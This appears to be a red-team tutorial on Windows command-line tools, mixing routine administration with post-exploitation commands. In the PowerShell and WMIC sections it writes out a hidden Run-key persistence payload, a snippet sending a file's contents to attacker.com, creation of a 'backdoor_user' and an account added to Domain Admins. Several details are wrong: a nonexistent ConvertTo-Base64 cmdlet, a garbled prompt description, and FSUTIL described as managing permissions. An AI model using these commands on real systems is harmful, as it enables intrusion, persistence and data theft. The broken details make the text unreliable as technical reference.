As a Red Team member, you need to have a solid understanding of the command-line tools available to you on Windows systems. This article will explore the most potent command-line tools for advanced Red Team members: PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin.
PowerShell
PowerShell is a command-line shell and scripting language designed specifically for Windows. It is based on the .NET Framework and provides access to a wide range of Windows administration capabilities. While commonly used for automation, PowerShell is also a powerful tool for interactive and manual system administration.
One of PowerShell’s main advantages is that it provides access to the Windows Management Instrumentation (WMI) framework. You can use PowerShell to perform various system administration tasks, such as managing processes, services, and users. Additionally, PowerShell provides access to the Registry and Active Directory, two critical Windows administration components.
PowerShell is often used for post-exploitation activities, as it can execute commands and scripts on a compromised system. To use PowerShell, open a command prompt and type “powershell”. This will start the PowerShell shell, which looks similar to a typical command prompt but with a different prompt (">" instead of “>_”).
One of the most useful PowerShell commands for Red Team members is
Invoke-Command. This command allows you to execute a command or script on a
remote system. For example, if you have compromised a system and want to execute
a PowerShell script on it, you can use the following command:
Invoke-Command -ComputerName "TARGET-SERVER" -ScriptBlock { Get-Process | Where-Object {$_.ProcessName -like "*suspicious*"} }
This will execute the PowerShell script on the remote system. You must have administrative credentials on the remote system to use this command.
Another useful PowerShell command is Get-WmiObject. This command allows you to
retrieve information from the WMI framework. For example, you can use the
following command to retrieve a list of running processes on a system:
Get-WmiObject -Class Win32_Process
This will return a list of all running processes on the local system. The “-ComputerName” parameter can retrieve the process list from a remote system.
Using PowerShell for post-exploitation activities
One of your primary objectives as a Red Team member is to maintain access to a compromised system. PowerShell can perform post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
To create a persistence mechanism on a compromised system using PowerShell, you can use the following command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "C:\Windows\System32\cmd.exe /c powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\temp\payload.ps1" -PropertyType String
This command creates a new registry value under the “Run” key that executes a PowerShell script at system startup. This is a common persistence technique used by threat actors.
To exfiltrate data from a compromised system, you can use the following command:
$data = Get-Content "C:\sensitive\document.txt" | ConvertTo-Base64
Invoke-RestMethod -Uri "https://attacker.com/exfil" -Method Post -Body $data -ContentType "application/json"
This command reads a file, converts it to base64, and sends it via HTTP POST to a remote server. This is a common data exfiltration technique.
To execute a command on a remote system using PowerShell, you can use the following command:
Invoke-Command -ComputerName "TARGET-SERVER" -ScriptBlock { Get-Service | Where-Object {$_.Status -eq "Running"} }
This command executes the specified command on the remote system and returns running services.
Using PowerShell for reconnaissance
PowerShell can be used for reconnaissance activities like network mapping and system enumeration. Here are some examples:
To map a network using PowerShell, you can use the following command:
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object IPAddress
This command retrieves the IP addresses of all network adapters currently enabled. You can use this information to map the network.
To enumerate the software installed on a system, you can use the following command:
Get-WmiObject -Class Win32_Product | Select-Object Name,Version
This command retrieves the names and versions of all software installed.
Using PowerShell to manage Active Directory
PowerShell can be used to manage Active Directory, a critical Windows administration component. Here are some examples:
To create a new user account in Active Directory, you can use the following command:
New-ADUser -Name "service_account" -GivenName "Service" -Surname "Account" -UserPrincipalName "service_account@domain.local" -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) -Enabled $true
This command creates a new enabled user account with the specified name, given name, surname, and user principal name. The account password is specified using the ConvertTo-SecureString cmdlet for security.
To modify the group membership of a user account in Active Directory, you can use the following command:
Add-ADGroupMember -Identity "Domain Admins" -Members "service_account"
This command adds the specified user account to the Domain Admins group. You can also use Remove-ADGroupMember to remove users from groups.
Netsh
Netsh is a command-line tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
One of the most valuable commands in Netsh is netsh advfirewall. This command
allows you to configure the Windows Advanced Firewall, a critical component of
network security on Windows systems. For example, you can use the following
command to add an inbound rule to the firewall that allows traffic on TCP port
80:
netsh advfirewall firewall add rule name="HTTP Inbound" dir=in action=allow protocol=TCP localport=80
This will create a new Windows Firewall rule allowing inbound traffic on TCP port 80.
Another helpful command in Netsh is netsh interface. This command allows you to
configure network adapters on a Windows system. For example, you can use the
following command to configure the IP address and subnet mask of a network
adapter:
netsh interface ip set address "Local Area Connection" static 192.168.1.10 255.255.255.0
WMIC
The Windows Management Instrumentation Command-line (WMIC) tool is a powerful command-line interface to the Windows Management Instrumentation (WMI) framework. WMIC can perform various system administration tasks, such as managing processes, services, and users.
To view a list of running processes, you can use the following command:
wmic process get Name,ProcessId,CommandLine
This command retrieves the names, process IDs, and command lines of all running processes on the system.
To create a new user account, you can use the following command:
wmic useraccount create name="backdoor_user" password="P@ssw0rd123!"
This command creates a new user account with the specified name and password. Note that this method is deprecated in favor of PowerShell cmdlets.
Tasklist
The Tasklist command-line tool allows you to view a list of running processes on a Windows system. Tasklist is similar to the “ps” command in Unix-based operating systems.
Tasklist is useful for identifying suspicious or unauthorized processes running on a compromised system.
To identify these processes, you can use the following command:
tasklist /v /fi "imagename eq svchost.exe"
This command retrieves detailed information about the process using the specified name. By analyzing the output, you can identify whether the process is malicious or legitimate.
FSUTIL
The FSUTIL command-line tool allows you to manage file systems and volumes on a Windows system. It can perform tasks such as creating and deleting file systems, compressing and decompressing files, and managing file permissions.
FSUTIL can be used to manage file systems and volumes on a Windows system. To view the USN journal data of a file, you can use the following command:
fsutil usn readdata "C:\Windows\System32\kernel32.dll"
This command retrieves the file’s USN journal data, which includes metadata about file changes, but not permissions. Use icacls to view or change actual file permissions.
To modify the permissions of a file, you can use the following command:
icacls "C:\sensitive\document.txt" /grant "backdoor_user":F
This command grants the specified user full permissions to access the file.
VSSAdmin
The VSSAdmin command-line tool allows you to manage the Volume Shadow Copy Service (VSS) on a Windows system. VSS is a built-in Windows service enabling you to create backup copies of files and system states.
VSSAdmin can be used to create and manage VSS snapshots. To create a new snapshot, you can use the following command:
vssadmin create shadow /for="C:"
This command creates a new VSS snapshot of the specified volume. This can be useful for creating backups before making system changes.
To list all existing VSS snapshots, you can use the following command:
vssadmin list shadows
This command retrieves a list of all VSS snapshots created on the system.
Conclusion
As a Red Team member, you must have a solid understanding of the command-line tools available to you on Windows systems. PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin are some of the most powerful tools for advanced Red Team members.
PowerShell is the most versatile and widely used tool. It provides access to the Windows Management Instrumentation (WMI) framework, the Registry, and Active Directory. PowerShell is often used for post-exploitation activities, such as creating persistence mechanisms, exfiltrating data, and executing commands on a remote system.
Netsh is a powerful tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
WMIC is a powerful tool for managing processes, services, and users on a Windows system. WMIC provides access to the Windows Management Instrumentation (WMI) framework, allowing you to perform various system administration tasks.
Tasklist is a tool for viewing a list of running processes on a Windows system. Tasklist is particularly useful for identifying malicious processes running on a compromised system.
FSUTIL is a tool for managing file systems and volumes on a Windows system. FSUTIL provides a wide range of functionality, from creating and deleting file systems to managing file permissions.
VSSAdmin is a tool for managing the Volume Shadow Copy Service (VSS) on a Windows system. It allows you to create and manage VSS snapshots, which are used to create backup copies of files and system states.
Mastering these tools is essential for red teamers looking to operate effectively in Windows environments.